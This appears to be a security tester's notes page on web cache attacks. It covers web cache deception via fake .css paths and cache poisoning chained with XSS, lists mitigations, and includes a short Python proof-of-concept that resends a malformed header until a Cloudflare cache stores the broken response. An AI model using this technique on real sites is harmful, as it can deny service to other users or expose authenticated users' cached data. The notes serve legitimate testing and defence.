Link to this headingCache

Things to check:

  • Check Response Headers for Cache Information
  • Send a malformed Header then test to see if the same HTTP error code is returned when the header is set normally

Link to this headingCache Deception Attack

Web Servers look at the file extension for setting cache and caching responses.

When trying to access https://www.example.com/account.php/nonexistent.css

How it works:

  1. If the server returns home.php when accessing https://www.example.com/home.php/nonexistent.css
  2. Have an authenticated user trigger that URL
  3. Have a non authenticated user trigger that URL after.
  • Check if the non authenticated use sees information cached by the authenticated user.

This can be solved with Edge Cache TTL.
This can be solved with a 404 or 302.
Cache files by their content type

Link to this headingCache Poisoning

This type of attack must be chained with another type of attack. Lets say that a certain parameter, cookie, or header breaks the site. If this response can be cached and your cached response can be sent to other IPs and Users then you can purposely break the site for other people because the cached response is sent to others.

So If there is a XSS attack you can cache the response and make it be sent to others.

PoC:

import requests import sys max_tries = 5 url = sys.argv[1] custom_header = "X-React-Router-Spa-Mode: aa" #sys.argv[2] def make_request(url): headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0", "X-React-Router-Spa-Mode": "aa", "Accept": "application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Sec-Fetch-Dest": "font", "Sec-Fetch-Site": "same-origin", "Te": "trailers", } #Take Custom Header and add it s1, s2 = custom_header.split(":") headers[s1] = s2 resp = requests.get(url, headers=headers) return resp #Hit the endpoint until it is cached for i in range(max_tries): resp = make_request(url) print(f"Response {resp.status_code}") if resp.headers["Cf-Cache-Status"] == "HIT": print(f"Response Has been cached after {i+1} requests.") print(f"Try: curl {url}") break #Try hitting it with a different IP, Browser, curl to see if the cached response is given back to you

Link to this headingSide Channel Leaks

XS-Leaks Wiki